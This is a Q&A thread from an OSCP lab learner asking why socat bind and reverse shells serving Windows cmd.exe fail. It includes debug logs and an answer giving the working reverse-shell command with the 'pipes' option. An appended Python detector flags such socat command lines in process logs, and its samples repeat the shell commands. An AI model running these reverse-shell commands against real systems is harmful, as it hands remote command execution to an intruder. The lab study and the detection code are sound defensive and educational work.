linux - Socat - how to create a Windows reverse shell

Tags: linux windows bash shell

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.

Closed 2 years ago.
I recently upgraded my OSCP material to the new OSCP 2020 version, and I came across the chapter on creating encrypted bind/reverse shells with socat. I thought I knew how to use it, but my attempt to send an encrypted reverse shell from my Windows machine to my Kali machine was unsuccessful. I decided to do some trial and error with unencrypted bind shells on both sides.
This is what works for me:

  • Kali bind shell (get /bin/bash on Windows by connecting to the shell socket bound on Kali)
  • Kali reverse shell (get /bin/bash on Windows by sending it to a listening socket on Windows)

This does not work for me:

  • Windows bind shell (get cmd.exe by connecting to a listening shell socket on Windows)
  • Windows reverse shell (get cmd.exe by sending it to a listening socket on Kali)

This is what I did:

    Kali bind shell - OK
    Kali (192.168.119.145): socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash
    Windows 10 (192.168.145.10): socat -d -d -d - TCP4:192.168.119.145:4444

    Kali reverse shell - OK
    Windows 10 (192.168.145.10): socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
    Kali (192.168.119.145): socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash

    Windows bind shell - not OK
    Windows 10 (192.168.145.10): socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe
    Kali (192.168.119.145): socat -d -d -d - TCP4:192.168.145.10:4444

    Windows reverse shell - not OK
    Kali (192.168.119.145): socat -d -d -d TCP4-LISTEN:4444,fork STDOUT
    Windows 10 (192.168.145.10): socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe

This is what I get:

    Windows bind shell - Windows machine
    C:\Windows\system32>socat -d -d -d TCP4-LISTEN:443,fork EXEC:cmd.exe
    2020/02/18 10:22:04 socat[3712] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
    2020/02/18 10:22:04 socat[3712] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
    2020/02/18 10:22:04 socat[3712] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
    2020/02/18 10:22:04 socat[3712] I setting option "fork" to 1
    2020/02/18 10:22:04 socat[3712] I socket(2, 1, 6) -> 5
    2020/02/18 10:22:04 socat[3712] I starting accept loop
    2020/02/18 10:22:04 socat[3712] N listening on AF=2 0.0.0.0:443
    2020/02/18 10:22:25 socat[3712] I accept(5, {2, AF=2 192.168.119.145:36796}, 16) -> 6
    2020/02/18 10:22:25 socat[3712] N accepting connection from AF=2 192.168.119.145:36796 on AF=2 192.168.145.10:443
    2020/02/18 10:22:25 socat[3712] I permitting connection from AF=2 192.168.119.145:36796
    2020/02/18 10:22:25 socat[3712] N forked off child process 4252
    2020/02/18 10:22:25 socat[4252] I just born: child proces2020/02/18 10:22:25 socat[3712] I close(6)
    2020/02/18 10:22:25 socat[4252] I just born: child process 4252
    2020/02/18 10:22:25 socat[4252] I close(5)stening
    2020/02/18 10:22:25 socat[4252] N forking off child, using socket for reading and writing
    2020/02/18 10:22:25 socat[4252] I socketpair(1, 1, 0, {5,7}) -> 0
    2020/02/18 10:22:25 socat[4252] N forked off child process 56402020/02/18 10:22:25 socat[5640] I just born: child proces
    2020/02/18 10:22:25 socat[4252] N forked off child process 5640
    2020/02/18 10:22:25 socat[5640] I close(5)
    2020/02/18 10:22:25 socat[5640] I dup2(7, 0) -> 0
    2020/02/18 10:22:25 socat[5640] I dup2(7, 1) -> 1ened all sock addresses
    2020/02/18 10:22:25 socat[5640] I close(7) data transfer loop with FDs [6,6] and [5,5]
    2020/02/18 10:22:25 socat[5640] N execvp'ing "cmd.exe"
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    2020/02/18 10:22:25 socat[4252] W read(5, 0x20044610, 8192): Connection reset by peer
    2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 202020/02/18 10:22:25 socat[4252] I childdied(signum=20)
    2020/02/18 10:22:25 socat[4252] I waitpid(): child 5640 exited with status 0
    2020/02/18 10:22:25 socat[4252] I childdied() finishedANG): No child processes
    2020/02/18 10:22:25 socat[4252] N socket 2 to socket 1 is in error
    2020/02/18 10:22:25 socat[4252] N socket 2 (fd 5) is at EOF
    2020/02/18 10:22:25 socat[4252] I shutdown(6, 1)
    2020/02/18 10:22:25 socat[4252] I terminated child did not leave data for us
    2020/02/18 10:22:25 socat[4252] I poll timed out (no data within 0.500000 seconds)
    2020/02/18 10:22:25 socat[4252] I shutdown(6, 2)
    2020/02/18 10:22:25 socat[4252] I shutdown(5, 2)
    2020/02/18 10:22:25 socat[4252] N exiting with status 0
    2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 20
    2020/02/18 10:22:25 socat[3712] I childdied(signum=20)
    2020/02/18 10:22:25 socat[3712] I childdied(20): cannot identify child 4252
    2020/02/18 10:22:25 socat[3712] I waitpid(): child 4252 exited with status 0
    2020/02/18 10:22:25 socat[3712] I waitpid(-1, {}, WNOHANG): No child processes
    2020/02/18 10:22:25 socat[3712] I childdied() finished
    
    Windows bind shell - Kali machine
    root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d - TCP4:192.168.145.10:443
    2020/02/18 13:22:24 socat[9004] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
    2020/02/18 13:22:24 socat[9004] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)
    2020/02/18 13:22:24 socat[9004] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
    2020/02/18 13:22:24 socat[9004] N reading from and writing to stdio
    2020/02/18 13:22:24 socat[9004] N opening connection to AF=2 192.168.145.10:443
    2020/02/18 13:22:24 socat[9004] I starting connect loop
    2020/02/18 13:22:24 socat[9004] I socket(2, 1, 6) -> 5
    2020/02/18 13:22:24 socat[9004] N successfully connected from local address AF=2 192.168.119.145:36796
    2020/02/18 13:22:24 socat[9004] I resolved and opened all sock addresses
    2020/02/18 13:22:24 socat[9004] N starting data transfer loop with FDs [0,1] and [5,5]
    2020/02/18 13:22:25 socat[9004] N socket 2 (fd 5) is at EOF
    2020/02/18 13:22:25 socat[9004] I poll timed out (no data within 0.500000 seconds)
    2020/02/18 13:22:25 socat[9004] I shutdown(5, 2)
    2020/02/18 13:22:25 socat[9004] N exiting with status 0
    
    Windows reverse shell - Kali machine
    root@kali:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d TCP4-LISTEN:443 STDOUT
    2020/02/18 13:07:13 socat[8925] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
    2020/02/18 13:07:13 socat[8925] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
    2020/02/18 13:07:13 socat[8925] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
    2020/02/18 13:07:13 socat[8925] I socket(2, 1, 6) -> 5
    2020/02/18 13:07:13 socat[8925] I starting accept loop
    2020/02/18 13:07:13 socat[8925] N listening on AF=2 0.0.0.0:443
    2020/02/18 13:07:18 socat[8925] I accept(5, {2, AF=2 192.168.145.10:61633}, 16) -> 6
    2020/02/18 13:07:18 socat[8925] N accepting connection from AF=2 192.168.145.10:61633 on AF=2 192.168.119.145:443
    2020/02/18 13:07:18 socat[8925] I permitting connection from AF=2 192.168.145.10:61633
    2020/02/18 13:07:18 socat[8925] I close(5)
    2020/02/18 13:07:18 socat[8925] N using stdout for reading and writing
    2020/02/18 13:07:18 socat[8925] I resolved and opened all sock addresses
    2020/02/18 13:07:18 socat[8925] N starting data transfer loop with FDs [6,6] and [1,1]
    2020/02/18 13:07:18 socat[8925] N socket 1 (fd 6) is at EOF
    2020/02/18 13:07:18 socat[8925] I poll timed out (no data within 0.500000 seconds)
    2020/02/18 13:07:18 socat[8925] I shutdown(6, 2)
    2020/02/18 13:07:18 socat[8925] N exiting with status 0
    
    Windows reverse shell - Windows machine
    C:\Windows\system32>socat -d -d -d TCP4:192.168.119.145:443 EXEC:cmd.exe
    2020/02/18 10:06:39 socat[5396] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
    2020/02/18 10:06:39 socat[5396] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
    2020/02/18 10:06:39 socat[5396] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
    2020/02/18 10:06:39 socat[5396] N opening connection to AF=2 192.168.119.145:443
    2020/02/18 10:06:39 socat[5396] I starting connect loop
    2020/02/18 10:06:39 socat[5396] I socket(2, 1, 6) -> 5
    2020/02/18 10:06:39 socat[5396] N successfully connected from local address AF=2 192.168.145.10:61630
    2020/02/18 10:06:39 socat[5396] N forking off child, using socket for reading and writing
    2020/02/18 10:06:39 socat[5396] I socketpair(1, 1, 0, {6,7}) -> 0
    2020/02/18 10:06:39 socat[5396] N forked off child process 2688
    2020/02/18 10:06:39 socat[2688] I just born: child process 2688
    2020/02/18 10:06:39 socat[5396] N forked off child process 2688
    2020/02/18 10:06:39 socat[5396] I close(7)
    2020/02/18 10:06:39 socat[5396] I resolved and opened all sock addresses
    2020/02/18 10:06:39 socat[5396] N starting data transfer loop with FDs [5,5] and [6,6]
    2020/02/18 10:06:39 socat[2688] I close(6)
    2020/02/18 10:06:39 socat[2688] I dup2(7, 0) -> 0
    2020/02/18 10:06:39 socat[2688] I dup2(7, 1) -> 1
    2020/02/18 10:06:39 socat[2688] I close(7)
    2020/02/18 10:06:39 socat[2688] N execvp'ing "cmd.exe"
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    The process tried to write to a nonexistent pipe.
    2020/02/18 10:06:39 socat[5396] W read(6, 0x20044228, 8192): Connection reset by peer
    2020/02/18 10:06:39 socat[5396] N childdied(): handling signal 20
    2020/02/18 10:06:39 socat[5396] I childdied(signum=20)
    2020/02/18 10:06:39 socat[5396] I exec'd process 2688 on socket 1 terminated
    2020/02/18 10:06:39 socat[5396] I waitpid(): child 2688 exited with status 0
    2020/02/18 10:06:39 socat[5396] I waitpid(-1, {}, WNOHANG): No child processes
    2020/02/18 10:06:39 socat[5396] I childdied() finished
    2020/02/18 10:06:39 socat[5396] N socket 2 to socket 1 is in error
    2020/02/18 10:06:39 socat[5396] N socket 2 (fd 6) is at EOF
    2020/02/18 10:06:39 socat[5396] I shutdown(5, 1)
    2020/02/18 10:06:39 socat[5396] I terminated child did not leave data for us
    2020/02/18 10:06:39 socat[5396] I poll timed out (no data within 0.500000 seconds)
    2020/02/18 10:06:39 socat[5396] I shutdown(5, 2)
    2020/02/18 10:06:39 socat[5396] I shutdown(6, 2)
    2020/02/18 10:06:39 socat[5396] N exiting with status 0
    
What am I doing wrong here?
Why can't I attach the Windows cmd.exe process to the socket?
PS: I know the timestamps between my examples don't match.

Best answer

To get a reverse shell from Windows, add the "pipes" option at the end:

Example:

Kali box:
socat TCP4-LISTEN:443,fork STDOUT

Windows box:
socat -d -d TCP4:192.168.X.X:443 EXEC:'cmd.exe',pipes
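The answer shows that a single address option separates a socat invocation that fails with "nonexistent pipe" from one that hands a remote peer a working cmd.exe, which is why the socat command line itself is the thing worth watching on the host. The script below is an added example written for this thread; it is not code from the question, the answer or the socat project. It classifies process-creation command lines (the CommandLine field of a Sysmon Event ID 1 or Windows 4688 record is the assumed source) by parsing socat's two addresses and reporting when an EXEC or SYSTEM address is joined to a listening or outbound network address, with a higher severity when the program is a known interpreter. The sample events are constructed and include the commands from this thread; the option handling is a deliberate simplification of socat's real address syntax.

```python
"""Spot socat command lines that attach a program to a network socket.

Added illustration for this thread, not code from the question, the answer or
the socat project. Input is assumed to be raw process command lines such as the
CommandLine field of Sysmon Event ID 1 / Windows Event 4688. The address parsing
is a simplification (assumption: exactly two addresses, a handful of value-taking
flags, no nested addresses); every event in SAMPLE_EVENTS is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Whitespace-separated tokens, but a quoted span ("bash -i") stays inside its token.
TOKEN = re.compile(r"""(?:[^\s"']+|"[^"]*"|'[^']*')+""")
NET_LISTEN = re.compile(r"^(tcp|tcp4|tcp6|udp|udp4|udp6|sctp|openssl|ssl)-listen$")
NET_CONNECT = re.compile(r"^(tcp|tcp4|tcp6|udp|udp4|udp6|sctp|openssl|ssl)(-connect)?$")
EXEC_KEYWORDS = {"exec", "system"}
# Programs that hand the remote end a command interpreter (high severity).
INTERPRETERS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh", "pwsh.exe",
                "bash", "sh", "zsh", "dash", "ksh"}
# socat flags that consume the following token (assumption: the common ones only).
FLAGS_WITH_VALUE = {"-t", "-T", "-b", "-L", "-W", "-r", "-R", "-S", "-lf", "-lp"}


@dataclass
class Finding:
    kind: str           # "listen" (bind-style) or "connect" (call-back / reverse)
    program: str        # what the EXEC/SYSTEM address runs
    endpoint: str       # port for a listener, host:port for an outbound connection
    options: tuple      # options on the EXEC address, e.g. ("pipes",)
    interpreter: bool   # True when the program is a known shell


def tokenize(cmdline: str) -> List[str]:
    """Split on whitespace, keep quoted spans together, then drop the quote marks."""
    return [t.replace('"', "").replace("'", "") for t in TOKEN.findall(cmdline)]


def parse_address(token: str):
    """Break 'TCP4-LISTEN:4444,fork' into ('tcp4-listen', '4444', ('fork',))."""
    if token == "-":
        return "stdio", "", ()
    keyword, sep, rest = token.partition(":")
    if not sep:                      # bare keyword such as STDOUT or STDIN,ignoreeof
        keyword, *opts = keyword.split(",")
        return keyword.lower(), "", tuple(o.lower() for o in opts)
    param, *opts = rest.split(",")   # first comma ends the parameter (simplification)
    return keyword.lower(), param, tuple(o.lower() for o in opts)


def basename(path: str) -> str:
    """Last path component for both Windows and POSIX separators, lowercased."""
    return re.split(r"[\\/]", path.strip())[-1].lower()


def classify(cmdline: str) -> Optional[Finding]:
    """Return a Finding when socat joins EXEC/SYSTEM to a network address, else None."""
    tokens = tokenize(cmdline)
    if not tokens or basename(tokens[0]) not in ("socat", "socat.exe"):
        return None
    addresses, skip = [], False
    for tok in tokens[1:]:
        if skip:                     # value belonging to the previous flag
            skip = False
            continue
        if tok.startswith("-") and tok != "-":
            skip = tok in FLAGS_WITH_VALUE
            continue
        addresses.append(parse_address(tok))
    if len(addresses) != 2:
        return None
    exec_side = next((a for a in addresses if a[0] in EXEC_KEYWORDS), None)
    net_side = next((a for a in addresses
                     if NET_LISTEN.match(a[0]) or NET_CONNECT.match(a[0])), None)
    if exec_side is None or net_side is None:
        return None
    program = exec_side[1]
    return Finding(
        kind="listen" if NET_LISTEN.match(net_side[0]) else "connect",
        program=program,
        endpoint=net_side[1],
        options=exec_side[2],
        interpreter=basename(program.split()[0]) in INTERPRETERS if program else False,
    )


def triage(events: List[str]):
    """Classify a batch and return only the hits, interpreter cases first."""
    hits = []
    for cmd in events:
        finding = classify(cmd)
        if finding:
            hits.append(("high" if finding.interpreter else "medium", finding, cmd))
    hits.sort(key=lambda h: h[0] != "high")   # stable: keeps input order within a level
    return hits


# Constructed process-creation command lines; the first two mirror the thread.
SAMPLE_EVENTS = [
    r"socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash",
    r"C:\tools\socat.exe -d -d TCP4:192.168.119.145:443 EXEC:'cmd.exe',pipes",
    r"socat TCP4-LISTEN:443,fork STDOUT",                          # listener only
    r"socat TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.0.5:80",      # plain port forward
    r"socat -t 30 OPENSSL:10.0.0.9:443,verify=0 EXEC:C:\Windows\System32\cmd.exe,pipes",
    r"socat EXEC:'git upload-pack .' TCP-LISTEN:9418,reuseaddr",   # EXEC, but not a shell
]

if __name__ == "__main__":
    for severity, finding, cmd in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {finding.kind:7} {finding.program!r:40} -> {finding.endpoint}  ({cmd})")
```

The classifier keys on the pairing of an EXEC/SYSTEM address with a network address rather than on the string "cmd.exe", so the encrypted OPENSSL variant the question set out to build is caught the same way as the plain TCP one; the `interpreter` flag is what separates a port forward or a git daemon from a shell handed to a remote peer.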

Regarding "linux - Socat - how to create a Windows reverse shell", we found a similar question on Stack Overflow: https://stackoverflow.com/questions/60287549/
